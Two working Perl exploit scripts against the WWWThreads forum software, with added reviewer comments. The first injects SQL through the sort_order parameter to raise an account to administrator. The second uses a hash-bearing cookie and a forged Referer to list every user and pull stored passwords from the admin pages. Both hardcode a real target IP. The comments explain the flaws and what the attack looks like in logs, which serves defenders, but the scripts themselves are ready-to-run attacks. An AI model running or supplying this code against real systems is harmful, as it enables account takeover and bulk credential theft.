#!/usr/bin/perl
# wwwthreads hack by rfp@wiretrip.net
# elevate a user to admin status
#
# by rain forest puppy / rfp@wiretrip.net
use Socket;

#####################################################
# modify these
#
# This statement run builds a single HTTP/1.0 GET for changedisplay.pl
# and prints whatever the server sends back.  Per the file header, the
# intended effect is that the named account gains administrator status.

# can be DNS or IP address
$ip="209.143.242.119";

$username="rfp";
# remember to put a '\' before the '$' characters
# (an unescaped '$' inside a double-quoted Perl string would be
# interpolated as a variable)
# NOTE(review): the value sent as Oldpass is the stored hash string, not
# a clear-text password.  That suggests the application accepts the hash
# itself as the credential, making it password-equivalent -- confirm
# against the server-side script.
$passhash="\$1\$V2\$sadklfjasdkfhjaskdjflh";

#####################################################

# Query string.  Every field except sort_order is an ordinary display
# preference.  sort_order is "5" followed by
#     ,U_Status%3d'Administrator',U_Security%3d100
# where %3d is a URL-encoded '='.
# NOTE(review): presumably the server places sort_order, unquoted and
# unvalidated, into the assignment list of an SQL UPDATE, so the extra
# column=value pairs are written along with the preference -- confirm
# against changedisplay.pl.
# Defensive reading: sort_order should be accepted only as an integer
# from an allow-list and passed as a bound parameter.  In access logs, a
# sort_order value containing ',', a quote or %3d on changedisplay.pl
# is a strong indicator of this request.
$parms="Cat=&Username=$username&Oldpass=$passhash".
"&sort_order=5,U_Status%3d'Administrator',U_Security%3d100".
"&display=threaded&view=collapsed&PostsPer=10".
"&Post_Format=top&Preview=on&TextCols=60&TextRows=5&FontSize=0".
"&FontFace=&PictureView=on&PicturePost=off";

# Raw request text.  The Referer header names a page on the same host.
# NOTE(review): presumably the target script checks Referer before
# acting; the header is client-supplied, so such a check is not an
# access control.
$tosend="GET /cgi-bin/wwwthreads/changedisplay.pl?$parms HTTP/1.0\r\n".
"Referer: http://$ip/cgi-bin/wwwthreads/previewpost.pl\r\n\r\n";

# Send the request and dump the response lines to STDOUT.
print sendraw($tosend);

# sendraw($pstr) -- write $pstr verbatim to TCP port 80 on the host
# named by the file-level $ip and return the response as a list of
# lines.  Dies if the name cannot be resolved, the socket cannot be
# created, or the connection fails.  The connection is plain TCP; no
# TLS is involved.
sub sendraw {
        my ($pstr)=@_; my $target;
        # Resolve the global $ip (name or dotted quad) to a packed address.
        $target= inet_aton($ip) || die("inet_aton problems");
        # Bareword handle S; protocol number falls back to 0 if the
        # 'tcp' lookup fails.
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        # The sockaddr is packed by hand: native short 2 (address family),
        # network-order port 80, the 4-byte address, 8 bytes of padding.
        # NOTE(review): the literal 2 and this layout are platform
        # assumptions; Socket's sockaddr_in() is the portable form.
        if(connect(S,pack "SnA4x8",2,80,$target)){
                # Make S the default output handle and turn on autoflush
                # for it, so the print below goes to the socket unbuffered.
                select(S);              $|=1;
                # Send the request, then read every line until the peer
                # closes the connection.
                print $pstr;            my @in=<S>;
                # Restore STDOUT as the default output handle before returning.
                select(STDOUT);         close(S);
                return @in;
        } else { die("Can't connect...\n"); }}


-[ w3tpass.pl

#!/usr/bin/perl
# download all wwwthread usernames/passwords once you're administrator
# send a fake cookie with authentication and fake the referer
# initial passwords are 6 chars long, contain a-zA-Z0-9 EXCEPT l,O,1
#
# by rain forest puppy / rfp@wiretrip.net
use Socket;

#####################################################
# modify these
#
# This statement run works in two passes against the admin pages:
# first it collects user names from showusers.pl, then it requests
# showoneuser.pl for each name and prints the OldPass form value found
# in the response.  Results go to STDOUT, progress messages to STDERR.

# can be DNS or IP address
$ip="209.143.242.119";

$username="rfp";
# remember to put a '\' before the '$' characters
# (an unescaped '$' inside a double-quoted Perl string would be
# interpolated as a variable)
# NOTE(review): this hash is sent as the Password cookie below, so the
# application apparently authenticates on the stored hash itself --
# anyone who can read a hash can present it.  Confirm server-side.
$passhash="\$1\$V2\$zxcvzxvczxcvzxvczxcv";

#####################################################

# Values for the Start parameter of showusers.pl: '0' and 'A'..'Z'.
@letts=split(//,'0ABCDEFGHIJKLMNOPQRSTUVWXYZ');
print STDERR "wwwthreads password snatcher by rain forest puppy\r\n";
print STDERR "Getting initial user lists...";

# Pass 1: one request per Start value.  Each request carries a Referer
# on the same host and a Cookie holding Username and Password.
# NOTE(review): presumably Referer plus this cookie are all the admin
# scripts check; both are client-supplied values.
foreach $let (@letts){
 $parms="Cat=&Start=$let";
 $tosend="GET /cgi-bin/wwwthreads/admin/showusers.pl?$parms HTTP/1.0\r\n".
  "Referer: http://$ip/cgi-bin/wwwthreads/\r\n".
  "Cookie: Username=$username; Password=$passhash\r\n\r\n";

 my @D=sendraw($tosend);
 foreach $line (@D){
  # Collect the (still URL-encoded) User= value from each link to
  # showoneuser.pl in the listing.
  if($line=~/showoneuser\.pl\?User=([^"]+)\"\>/){
   push @users, $1;}}}

# An array in scalar context yields its element count.
$usercount=@users;
print STDERR "$usercount users retrieved.\r\n".
 "Fetching individual passwords...\r\n";

# Pass 2: one request per collected user.
# Defensive reading: the admin page returns the stored password value
# inside the HTML form (the OldPass field matched below); an
# application should never echo stored credentials back to a client.
# In access logs this run appears as showusers.pl requested with
# Start=0,A..Z in order, followed by one showoneuser.pl request per
# user from the same client.
foreach $user (@users){
 $parms="User=$user";
 $tosend="GET /cgi-bin/wwwthreads/admin/showoneuser.pl?$parms HTTP/1.0\r\n".
  "Referer: http://$ip/cgi-bin/wwwthreads/\r\n".
  "Cookie: Username=$username; Password=$passhash\r\n\r\n";

 my @D=sendraw($tosend);
 foreach $line (@D){
  if($line=~/OldPass value = "([^"]+)"/){
   # Copy the captured value into $pass and URL-decode it (%XX -> byte).
   ($pass=$1)=~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
   # URL-decode the user name too; $user aliases the @users element,
   # so the array entry is decoded in place.
   $user =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
   # One record per user: name, ':', value, then ten ':' characters.
   print $user.':'.$pass."::::::::::\n";
   # Only the first matching line of each response is used.
   last;}}}

print STDERR "done.\r\n\r\n";

# sendraw($pstr) -- write $pstr verbatim to TCP port 80 on the host
# named by the file-level $ip and return the response as a list of
# lines.  Dies if the name cannot be resolved, the socket cannot be
# created, or the connection fails.  The connection is plain TCP; no
# TLS is involved.
sub sendraw {
        my ($pstr)=@_; my $target;
        # Resolve the global $ip (name or dotted quad) to a packed address.
        $target= inet_aton($ip) || die("inet_aton problems");
        # Bareword handle S; protocol number falls back to 0 if the
        # 'tcp' lookup fails.
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        # The sockaddr is packed by hand: native short 2 (address family),
        # network-order port 80, the 4-byte address, 8 bytes of padding.
        # NOTE(review): the literal 2 and this layout are platform
        # assumptions; Socket's sockaddr_in() is the portable form.
        if(connect(S,pack "SnA4x8",2,80,$target)){
                # Make S the default output handle and turn on autoflush
                # for it, so the print below goes to the socket unbuffered.
                select(S);              $|=1;
                # Send the request, then read every line until the peer
                # closes the connection.
                print $pstr;            my @in=<S>;
                # Restore STDOUT as the default output handle before returning.
                select(STDOUT);         close(S);
                return @in;
        } else { die("Can't connect...\n"); }}
